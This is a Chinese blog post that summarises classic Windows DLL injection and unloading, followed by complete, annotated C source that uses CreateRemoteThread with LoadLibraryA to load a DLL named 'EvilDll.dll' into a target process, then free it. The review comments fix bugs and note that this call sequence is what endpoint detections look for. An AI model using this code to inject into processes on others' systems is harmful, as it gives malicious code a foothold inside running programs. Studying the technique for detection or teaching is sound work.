Pnig0s1992:算是复习了,最经典的教科书式的Dll注入。
总结一下基本的注入过程,分注入和卸载
注入Dll:
1,OpenProcess获得要注入进程的句柄
2,VirtualAllocEx在远程进程中开辟出一段内存,长度为strlen(dllname)+1;
3,WriteProcessMemory将Dll的名字写入第二步开辟出的内存中。
4,CreateRemoteThread将LoadLibraryA作为线程函数,参数为Dll的名称,创建新线程
5,CloseHandle关闭线程句柄
卸载Dll:
1,CreateRemoteThread将GetModuleHandle注入到远程进程中,参数为被注入的Dll名
2,GetExitCodeThread将线程退出的退出码作为Dll模块的句柄值。
3,CloseHandle关闭线程句柄
4,CreateRemoteThread将FreeLibrary注入到远程进程中,参数为第二步获得的句柄值。
5,WaitForSingleObject等待对象句柄返回
6,CloseHandle关闭线程及进程句柄。
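//Code By Pnig0s1992
//Date:2012,3,13
#include <stdio.h>
#include <string.h>
#include <Windows.h>
#include <TlHelp32.h>

/*
 * Look up a process ID by executable name.
 *
 * Walks a Toolhelp process snapshot and returns th32ProcessID of the first
 * entry whose szExeFile compares equal (case-sensitive lstrcmp) to
 * lpProcessName. Returns 0 when the snapshot cannot be taken, the first
 * entry cannot be read, or nothing matches.
 *
 * The name "getProcessHandle" is historical: the value returned is a PID,
 * not a HANDLE.
 */
DWORD getProcessHandle(LPCTSTR lpProcessName)
{
    DWORD dwRet = 0;
    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapShot == INVALID_HANDLE_VALUE)
    {
        /* GetLastError() is a DWORD; %d was a format/argument mismatch. */
        printf("\n获得进程快照失败%lu", (unsigned long)GetLastError());
        return dwRet;
    }

    PROCESSENTRY32 pe32 = {0};
    pe32.dwSize = sizeof(PROCESSENTRY32);   /* must be set before Process32First */

    /* Process32First can fail; the original ignored its result and then
     * compared an unfilled pe32.szExeFile in the loop below. */
    if (Process32First(hSnapShot, &pe32))
    {
        do
        {
            if (!lstrcmp(pe32.szExeFile, lpProcessName))
            {
                dwRet = pe32.th32ProcessID;
                break;
            }
        } while (Process32Next(hSnapShot, &pe32));
    }

    CloseHandle(hSnapShot);
    return dwRet;
}

/*
 * Entry point. argv[1] is the executable name of the target process.
 *
 * Sequence: resolve PID -> OpenProcess -> VirtualAllocEx + WriteProcessMemory
 * of the DLL name into the target -> CreateRemoteThread on LoadLibraryA;
 * then the reverse: CreateRemoteThread on GetModuleHandleA (module handle
 * recovered from the thread exit code) and CreateRemoteThread on FreeLibrary.
 *
 * Returns 0 on success, -1 on any failure (a message is printed first).
 *
 * Review notes:
 *  - Every step here (OpenProcess with PROCESS_VM_WRITE, cross-process
 *    VirtualAllocEx/WriteProcessMemory, CreateRemoteThread) is a well-known
 *    telemetry/EDR signal; this exact call sequence is what process-injection
 *    detections key on.
 *  - The remote buffer holding the DLL name was never freed; it is now
 *    released on every exit path via the `out:` label.
 *  - WriteProcessMemory reports bytes written through a SIZE_T*; passing a
 *    DWORD* (as the original did) corrupts the stack on 64-bit builds.
 *  - The unload step passed hThread, a thread handle, where CreateRemoteThread
 *    expects the process handle; corrected to hProcess.
 */
INT main(INT argc, CHAR *argv[])
{
    /* argv[1] was dereferenced unconditionally; lstrcmp on NULL crashes. */
    if (argc < 2)
    {
        printf("\nusage: %s <process name>", argv[0]);
        return -1;
    }

    /* NOTE(review): the cast assumes an ANSI (non-UNICODE) build; with
     * UNICODE defined LPCTSTR is wide and argv[1] would be misread. */
    DWORD dwPid = getProcessHandle((LPCTSTR)argv[1]);
    if (dwPid == 0)
    {
        printf("\n未找到指定进程");
        return -1;
    }

    LPCSTR lpDllName = "EvilDll.dll";

    /* NOTE(review): the access mask is kept exactly as the author wrote it;
     * compare it against what the calls that follow document as required. */
    HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwPid);
    if (hProcess == NULL)
    {
        printf("\n获取进程句柄错误%lu", (unsigned long)GetLastError());
        return -1;
    }

    INT rc = -1;
    SIZE_T dwSize = strlen(lpDllName) + 1;   /* include the terminating NUL */
    SIZE_T dwHasWrite = 0;                   /* SIZE_T, as WriteProcessMemory requires */
    DWORD dwNewThreadId = 0;
    DWORD dwHandle = 0;
    DWORD dwID = 0;
    HANDLE hNewRemoteThread = NULL;
    HANDLE hThread = NULL;
    LPVOID pFunc = NULL;

    LPVOID lpRemoteBuf = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
    if (lpRemoteBuf == NULL)
    {
        /* The original passed a NULL buffer straight into WriteProcessMemory. */
        printf("\n在远程进程中分配内存失败%lu", (unsigned long)GetLastError());
        CloseHandle(hProcess);
        return -1;
    }

    if (!WriteProcessMemory(hProcess, lpRemoteBuf, lpDllName, dwSize, &dwHasWrite))
    {
        printf("\n写入远程进程内存空间出错%lu。", (unsigned long)GetLastError());
        goto out;
    }
    if (dwHasWrite != dwSize)
    {
        /* Short write: bail out as the original did (silently). */
        goto out;
    }

    /* Assumes the target is the same bitness and maps kernel32 at the same
     * base as this process, so the local LoadLibraryA address is valid there. */
    hNewRemoteThread = CreateRemoteThread(hProcess, NULL, 0,
                                          (LPTHREAD_START_ROUTINE)LoadLibraryA,
                                          lpRemoteBuf, 0, &dwNewThreadId);
    if (hNewRemoteThread == NULL)
    {
        printf("\n建立远程线程失败%lu", (unsigned long)GetLastError());
        goto out;
    }
    WaitForSingleObject(hNewRemoteThread, INFINITE);
    CloseHandle(hNewRemoteThread);

    /* Unload the DLL injected above. */
    pFunc = (LPVOID)GetModuleHandleA;
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc,
                                 lpRemoteBuf, 0, &dwID);
    if (hThread == NULL)
    {
        printf("\n建立远程线程失败%lu", (unsigned long)GetLastError());
        goto out;
    }
    WaitForSingleObject(hThread, INFINITE);

    /* The thread exit code is GetModuleHandleA's return value. Exit codes are
     * 32-bit, so on a 64-bit target the HMODULE is truncated: this unload path
     * is only reliable for 32-bit processes. */
    if (!GetExitCodeThread(hThread, &dwHandle) || dwHandle == 0)
    {
        printf("\n获取Dll模块句柄失败%lu", (unsigned long)GetLastError());
        CloseHandle(hThread);
        goto out;
    }
    CloseHandle(hThread);

    /* The original passed hThread here instead of hProcess. */
    pFunc = (LPVOID)FreeLibrary;
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc,
                                 (LPVOID)(ULONG_PTR)dwHandle, 0, &dwID);
    if (hThread == NULL)
    {
        printf("\n建立远程线程失败%lu", (unsigned long)GetLastError());
        goto out;
    }
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    rc = 0;

out:
    /* MEM_COMMIT is not a valid dwFreeType for VirtualFreeEx; releasing a
     * whole reservation requires dwSize == 0 with MEM_RELEASE. */
    VirtualFreeEx(hProcess, lpRemoteBuf, 0, MEM_RELEASE);
    CloseHandle(hProcess);
    return rc;
}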
http://pnig0s1992.blog.51cto.com/393390/804484